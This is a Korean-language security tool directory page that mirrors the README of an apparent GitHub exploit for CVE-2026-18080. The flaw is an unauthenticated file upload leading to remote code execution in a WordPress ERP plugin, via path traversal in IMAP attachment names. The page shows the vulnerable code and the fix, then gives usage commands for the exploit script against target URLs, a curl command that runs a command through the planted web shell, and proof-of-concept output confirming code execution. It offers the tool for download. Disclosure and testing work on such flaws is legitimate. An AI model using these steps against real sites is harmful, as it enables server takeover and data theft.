Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
By-Poloss..-..CVE-2026-18080 — CVE-2026-18080에 대한 익스플로잇으로, ERP Complete HR, Accounting & CRM Suite에서 인증 없이 임의 파일 업로드가 가능하여 RCE(원격 코드 실행)로 이어지는 취약점입니다. 자동화된 공격을 위한 Python 및 PHP 스크립트가 포함되어 있습니다. | Kitploit
도구/GitHubGitHub/polosss/by-poloss..-..cve-2026-18080
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubpolosss/by-poloss..-..cve-2026-18080

By-Poloss..-..CVE-2026-18080

CVE-2026-18080에 대한 익스플로잇으로, ERP Complete HR, Accounting & CRM Suite에서 인증 없이 임의 파일 업로드가 가능하여 RCE(원격 코드 실행)로 이어지는 취약점입니다. 자동화된 공격을 위한 Python 및 PHP 스크립트가 포함되어 있습니다.

저장소 보기
19시간 38분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-18080 — ERP Complete HR, Accounting & CRM Suite <= 1.17.7

인증 없이 가능한 임의 파일 업로드 — CRM 이메일 연결 IMAP 첨부 파일 경로 탐색을 통한 RCE

필드값
CVEhttps://nvd.nist.gov/vuln/detail/CVE-2026-18080
Wordfencehttps://www.wordfence.com/threat-intel/vulnerabilities/id/b9d11eb9-5e18-459f-a9d4-cccb1d593402
패치https://plugins.trac.wordpress.org/changeset/3656848/erp
CVSS9.8 (Critical)
CWECWE-434 (위험한 유형의 파일 무제한 업로드)
영향 범위ERP 플러그인 버전 <= 1.17.7 (1.17.8에서 수정됨)

설명

ERP 플러그인의 GmailSync.php에 있는 save_attachments() 함수는 경로 정규화 없이 IMAP에서 수신된 이메일 첨부 파일을 처리합니다. 공격자는 ../../plugins/shell.php와 같은 파일 이름과 플러그인의 예상 패턴과 일치하는 위조된 References 헤더를 포함한 이메일을 제작할 수 있습니다. 크론 기반 IMAP 동기화 작업은 .htaccess로 보호되는 crm-attachments/ 디렉터리 밖의 wp-content/ 아래의 모든 쓰기 가능한 경로에 파일을 작성합니다.

근본 원인

GmailSync.php (v1.17.7):

root@kitploit:~
$name = $item['name'];              // basename() 또는 경로 정규화 없음
$file = wp_check_filetype( $item['name'] );
// ...
$saved = $wp_filesystem->put_contents( $dir . $name, $item['data'] );

../../plugins/shell.php 파일 이름이 $dir (wp-content/uploads/crm-attachments/)과 연결되면 wp-content/plugins/shell.php로 해석됩니다 — PHP 실행이 허용되는 디렉터리입니다.

수정 버전(v1.17.8)은 sanitize_attachment_filename()을 추가하여 basename()을 통해 디렉터리 구성 요소를 제거하고, 경로 구분자를 거부하며, 위험한 확장자를 차단합니다.

악용 방법

방법 1: 직접 (wp-cli)

root@kitploit:~
python3 exploit.py -t https://wordpress.ddev.site

방법 2: 사용자 지정 경로 및 셸 이름

root@kitploit:~
python3 exploit.py -t https://target.com --shell evil.php --path themes

방법 3: phpinfo 프로브

root@kitploit:~
python3 exploit.py -t https://target.com --phpinfo

업로드 성공 후:

root@kitploit:~
curl -X POST -d 'cmd=id' 'https://target.com/wp-content/plugins/cve-2026-18080.php'

개념 증명

root@kitploit:~
RESULT: [{"name":"../../plugins/cve-2026-18080.php","slug":"../../plugins/cve-2026-18080.php","path":".../crm-attachments/../../plugins/cve-2026-18080.php"}]
SUCCESS: wp-content/plugins/cve-2026-18080.php (57 bytes)
RCE: uid=1000(god) gid=1000(god)

파일

파일설명
exploit.pywp-cli을 사용하는 Python 악용 스크립트
exploit.phpwp eval-file용 독립형 PHP 악용 스크립트
README.md이 파일
도구 다운로드